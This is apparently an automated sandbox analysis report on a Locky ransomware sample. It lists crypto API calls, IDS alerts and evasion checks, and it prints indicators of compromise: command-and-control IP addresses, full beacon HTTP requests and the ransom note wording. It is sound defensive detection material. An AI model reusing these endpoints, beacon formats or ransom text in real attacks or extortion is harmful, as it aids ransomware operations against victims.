Source: LockyRansom.exe |
ReversingLabs: Detection: 95% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 99.9% probability |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA, |
0_2_00415310 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_00415410 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey, |
0_2_00416170 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004193D8 CryptReleaseContext, |
0_2_004193D8 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_0041544C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F8D0 CryptReleaseContext, |
0_2_0040F8D0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F890 CryptReleaseContext, |
0_2_0040F890 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F8B8 CryptReleaseContext, |
0_2_0040F8B8 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError, |
0_2_0040F980 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FB50 CryptDestroyKey, |
0_2_0040FB50 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FB10 CryptDestroyKey, |
0_2_0040FB10 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError, |
0_2_0040FBF0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack |
Source: LockyRansom.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: |
Binary string: gefas.pdb source: LockyRansom.exe |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0042D5D0 FindClose,FindFirstFileW, |
0_2_0042D5D0 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Joe Sandbox View |
ASN Name: ASBAXETRU ASBAXETRU |
Source: Joe Sandbox View |
ASN Name: AS-REGRU AS-REGRU |
Source: Joe Sandbox View |
ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU |
Source: Joe Sandbox View |
ASN Name: WEBHOST1-ASRU WEBHOST1-ASRU |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.183.165.45/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.183.165.45Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgin |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgir |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imag= |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiC |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiP |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgid |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgii |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgilh |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiy |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/ |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi0 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiL |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiP |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiV |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgii |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgik |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiy3 |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.1531oad.cgi%880 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/ |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288 |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://www.torproject.org/download/download-easy.html |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory : All of your files are encrypted with RSA-2048 and AES-128 ciphers. |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory : Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server. |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory : To receive your private key follow one of the links: |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_00415410 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_0041544C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004022D0 |
0_2_004022D0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040A58C |
0_2_0040A58C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004029C0 |
0_2_004029C0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040B2C4 |
0_2_0040B2C4 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040940E |
0_2_0040940E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040995F |
0_2_0040995F |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00409EB0 |
0_2_00409EB0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: String function: 004182C0 appears 33 times |
|
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: String function: 004761A0 appears 36 times |
|
Source: LockyRansom.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: classification engine |
Classification label: mal96.rans.evad.winEXE@1/0@0/4 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040CC4E CoCreateInstance, |
0_2_0040CC4E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: LockyRansom.exe |
ReversingLabs: Detection: 95% |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptdll.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mciwave.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: gfiwave.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: dsrole.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 |
Jump to behavior |
Source: LockyRansom.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: gefas.pdb source: LockyRansom.exe |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R; |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
0_2_004079B0 |
Source: LockyRansom.exe |
Static PE information: section name: .dec |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00404705 push ecx; ret |
0_2_00404718 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004029AB push ecx; ret |
0_2_004029BB |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00401408 push eax; ret |
0_2_00401426 |
Source: LockyRansom.exe |
Static PE information: section name: .rdata entropy: 7.910838175775477 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Evasive API call chain: GetUserDefaultLangID, ExitProcess |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess |
Source: C:\Users\user\Desktop\LockyRansom.exe |
API coverage: 7.7 % |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0042D5D0 FindClose,FindFirstFileW, |
0_2_0042D5D0 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\LockyRansom.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00405393 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
0_2_004079B0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_005C007E push dword ptr fs:[00000030h] |
0_2_005C007E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_005C03EE push dword ptr fs:[00000030h] |
0_2_005C03EE |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0069007E push dword ptr fs:[00000030h] |
0_2_0069007E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_006903EE push dword ptr fs:[00000030h] |
0_2_006903EE |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00405393 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00403A6C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00405F08 SetUnhandledExceptionFilter, |
0_2_00405F08 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0041973D SetSecurityDescriptorDacl, |
0_2_0041973D |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004197BD AllocateAndInitializeSid, |
0_2_004197BD |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: GetLocaleInfoA,GetUserDefaultUILanguage, |
0_2_0042E700 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, |
0_2_00406718 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00423053 GetVersionExA, |
0_2_00423053 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |